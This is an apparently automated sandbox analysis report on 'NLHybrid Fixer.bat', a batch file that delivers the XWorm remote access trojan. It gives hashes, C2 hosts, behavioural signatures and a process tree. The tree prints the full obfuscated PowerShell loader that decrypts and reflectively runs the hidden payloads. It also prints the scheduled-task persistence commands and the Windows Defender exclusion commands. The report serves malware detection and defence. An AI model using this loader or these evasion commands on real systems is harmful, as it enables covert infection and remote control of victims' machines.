Overview

overview

10

Static

static

1

NLHybrid Fixer.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    1151s
  • max time network
    1152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-11-2024 06:17

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    NLHybrid Fixer.bat

  • Size

    291KB

  • MD5

    734fdc5c211a7b1fe3a5101c3b0aafd6

  • SHA1

    3d8b84678e674a5b4b49ad4ee4669179d16b75d0

  • SHA256

    0682cfbf0f7c1425a627a847a7cfbc9d3c7633d8426b6f7800d81e391528167b

  • SHA512

    92b2af4e5dbdeefdad102696b8b6d85c10c2885d0e1bfb3d9b94c0ef8e1dafa488f8c8688504b8cb76e244f6abcd3f093e817f5767ae16daed89f80fcbb1db18

  • SSDEEP

    6144:uoiULBMXvSD+eFkX0TupDOYvaktWHHvdTNb71M943xw:uLULBM47FNuNOWaxvH7m43a

Score
10/10
xwormexecutionpersistencerattrojan

Malware Config

Extracted

Family

xworm

Version

5.0

C2

remote-newest.gl.at.ply.gg:62113

fund-scared.gl.at.ply.gg:62113
Mutex

UrM5eoX12ULh6st6

Attributes
  • Install_directory

    %Userprofile%

  • install_file

    win64updater.exe

aes.plain

Signatures

  • Detect Xworm Payload 4 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 17 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\NLHybrid Fixer.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4376
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('15dPngye8xc2zrvtzV/w74aCqiEwBCPIQU+QvJpDDdI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rYfQCcxwv9En0wj3TE+fMw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AIFyt=New-Object System.IO.MemoryStream(,$param_var); $lMkeE=New-Object System.IO.MemoryStream; $SZECh=New-Object System.IO.Compression.GZipStream($AIFyt, [IO.Compression.CompressionMode]::Decompress); $SZECh.CopyTo($lMkeE); $SZECh.Dispose(); $AIFyt.Dispose(); $lMkeE.Dispose(); $lMkeE.ToArray();}function execute_function($param_var,$param2_var){ $tWijb=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ZXwwn=$tWijb.EntryPoint; $ZXwwn.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\NLHybrid Fixer.bat';$GwBNZ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\NLHybrid Fixer.bat').Split([Environment]::NewLine);foreach ($aCkBV in $GwBNZ) { if ($aCkBV.StartsWith(':: ')) { $ggoTJ=$aCkBV.Substring(3); break; }}$payloads_var=[string[]]$ggoTJ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3144
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_267_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_267.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4816
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_267.vbs"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:4068
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_267.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3132
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('15dPngye8xc2zrvtzV/w74aCqiEwBCPIQU+QvJpDDdI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rYfQCcxwv9En0wj3TE+fMw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AIFyt=New-Object System.IO.MemoryStream(,$param_var); $lMkeE=New-Object System.IO.MemoryStream; $SZECh=New-Object System.IO.Compression.GZipStream($AIFyt, [IO.Compression.CompressionMode]::Decompress); $SZECh.CopyTo($lMkeE); $SZECh.Dispose(); $AIFyt.Dispose(); $lMkeE.Dispose(); $lMkeE.ToArray();}function execute_function($param_var,$param2_var){ $tWijb=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ZXwwn=$tWijb.EntryPoint; $ZXwwn.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_267.bat';$GwBNZ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_267.bat').Split([Environment]::NewLine);foreach ($aCkBV in $GwBNZ) { if ($aCkBV.StartsWith(':: ')) { $ggoTJ=$aCkBV.Substring(3); break; }}$payloads_var=[string[]]$ggoTJ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Drops startup file
            • Adds Run key to start application
            • Suspicious behavior: AddClipboardFormatListener
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:3264
            • C:\Users\Admin\AppData\Local\Temp\NLHybrid Fixer.exe
              "C:\Users\Admin\AppData\Local\Temp\NLHybrid Fixer.exe"
              6⤵
              • Executes dropped EXE
              PID:1660
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:4548
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:4428
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\win64updater.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:1680
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'win64updater.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:628
            • C:\Windows\System32\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "win64updater" /tr "C:\Users\Admin\win64updater.exe"
              6⤵
              • Scheduled Task/Job: Scheduled Task
              PID:4732
            • C:\Windows\System32\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /delete /f /tn "win64updater"
              6⤵
                PID:5076
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp61D2.tmp.bat""
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:4628
                • C:\Windows\system32\timeout.exe
                  timeout 3
                  7⤵
                  • Delays execution with timeout.exe
                  PID:2364
    • C:\Users\Admin\win64updater.exe
      C:\Users\Admin\win64updater.exe
      1⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      PID:3312

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize

      3KB

      MD5

      661739d384d9dfd807a089721202900b

      SHA1

      5b2c5d6a7122b4ce849dc98e79a7713038feac55

      SHA256

      70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

      SHA512

      81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      df87d69dfbe30a72be8a41ba7020fdb1

      SHA1

      319245bb2ad6416d3435d2857a746e54408a9822

      SHA256

      964060b36bdbc812fdbc2c4efa24d60551e2f4b54a18384b1a21992246f0901e

      SHA512

      cc7ee4f7042dacaec0d978205d75b06a02af1ebcd0e92af76a25961375e59a771be14af93c25a26585000555b7de603e7658069814b21e418a96e56d7c62e7fd

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      f8d49a4af7a844bfc7247d5670def557

      SHA1

      26ae0ce194a77a7a1887cf93741293fdfa6c94c4

      SHA256

      61c60aa2e781a7f6ab54577db26d1be6ca3bf40c4c1d29eca48698e8cb5e1a2b

      SHA512

      9e034173b20c85fc63ec88d045ace936af567e52caafe5e5735cf6fd5e72d040b992b38c0490ee9d9e43f6f934695d5913bc7a0c682b36c99e5e2d9923c24a9c

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      944B

      MD5

      77d622bb1a5b250869a3238b9bc1402b

      SHA1

      d47f4003c2554b9dfc4c16f22460b331886b191b

      SHA256

      f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

      SHA512

      d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      944B

      MD5

      a7cc007980e419d553568a106210549a

      SHA1

      c03099706b75071f36c3962fcc60a22f197711e0

      SHA256

      a5735921fc72189c8bf577f3911486cf031708dc8d6bc764fe3e593c0a053165

      SHA512

      b9aaf29403c467daef80a1ae87478afc33b78f4e1ca16189557011bb83cf9b3e29a0f85c69fa209c45201fb28baca47d31756eee07b79c6312c506e8370f7666

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\NLHybrid Fixer.exe
      Filesize

      42KB

      MD5

      269085c7755574a5cd840b298a0b4a55

      SHA1

      3b20a9f3c0e5ed34d37c5c915c07fd93da7d7cbd

      SHA256

      ee94f31406ba029502b3737f9d2c2d2d22448643deaa3095239a55b58b9169c8

      SHA512

      47b5782e53cf03bb5eb8f96584b9e0608bc10038b8721761bf67af75ed0b77a2e51ef94a9d62302e6e0d45885e72d47b80815caa8c063a616d50b646885b5f65

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_l4aa0vpp.gxa.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\tmp61D2.tmp.bat
      Filesize

      171B

      MD5

      ac0a9b0f125fb2ea1e6f097857708798

      SHA1

      c79e7de7ed6c0c0843571b5bd7f9e8eac82b0ac4

      SHA256

      a7d44b7db3b29bdcd06c3f1ca49b6176df159be30c796574d0b17b6e9dc943e8

      SHA512

      39fede3d9cb9ba0e55be078c4ac1cfc539d36971a444e47da860533c2ecb3044659eb0426e23d6b778eb3039a6b18bd7f751d3bc8fed19e5248cee8307118689

      Download Submit

    • C:\Users\Admin\AppData\Roaming\startup_str_267.bat
      Filesize

      291KB

      MD5

      734fdc5c211a7b1fe3a5101c3b0aafd6

      SHA1

      3d8b84678e674a5b4b49ad4ee4669179d16b75d0

      SHA256

      0682cfbf0f7c1425a627a847a7cfbc9d3c7633d8426b6f7800d81e391528167b

      SHA512

      92b2af4e5dbdeefdad102696b8b6d85c10c2885d0e1bfb3d9b94c0ef8e1dafa488f8c8688504b8cb76e244f6abcd3f093e817f5767ae16daed89f80fcbb1db18

      Download Submit

    • C:\Users\Admin\AppData\Roaming\startup_str_267.vbs
      Filesize

      115B

      MD5

      90d9f9c1ee8b2748879d3f0d7692e6c5

      SHA1

      9a88b51f56d0c106bf2e13585b96acfef536cb90

      SHA256

      15d67a91884058d7464b1939c42db9f37a9317f7d43115f3613f463af7389a23

      SHA512

      bd961df405cc444200f26e157dec1fa19377f88d29092726a604b1e90fde4c50c9a56d15fac9dce7b9a292f75e11c011ee98f341bbe80d756f49af5089c96bd4

      Download Submit

    • C:\Users\Admin\win64updater.exe
      Filesize

      442KB

      MD5

      04029e121a0cfa5991749937dd22a1d9

      SHA1

      f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

      SHA256

      9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

      SHA512

      6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

      Download Submit

    • memory/1660-62-0x00000000002D0000-0x00000000002E0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/3144-14-0x0000021034470000-0x00000210344AE000-memory.dmp

      Filesize

      248KB

      Download

    • memory/3144-13-0x0000021032150000-0x0000021032158000-memory.dmp

      Filesize

      32KB

      Download

    • memory/3144-1-0x0000021019BB0000-0x0000021019BD2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/3144-11-0x00007FFA076E0000-0x00007FFA081A1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3144-12-0x00007FFA076E0000-0x00007FFA081A1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3144-63-0x00007FFA076E0000-0x00007FFA081A1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3144-0-0x00007FFA076E3000-0x00007FFA076E5000-memory.dmp

      Filesize

      8KB

      Download

    • memory/3264-51-0x000002BC82520000-0x000002BC82530000-memory.dmp

      Filesize

      64KB

      Download

    • memory/3312-122-0x0000020E716D0000-0x0000020E71714000-memory.dmp

      Filesize

      272KB

      Download

    • memory/3312-123-0x0000020E71B40000-0x0000020E71BB6000-memory.dmp

      Filesize

      472KB

      Download

    • memory/4816-25-0x00007FFA076E0000-0x00007FFA081A1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4816-30-0x00007FFA076E0000-0x00007FFA081A1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4816-26-0x00007FFA076E0000-0x00007FFA081A1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4816-27-0x00007FFA076E0000-0x00007FFA081A1000-memory.dmp

      Filesize

      10.8MB

      Download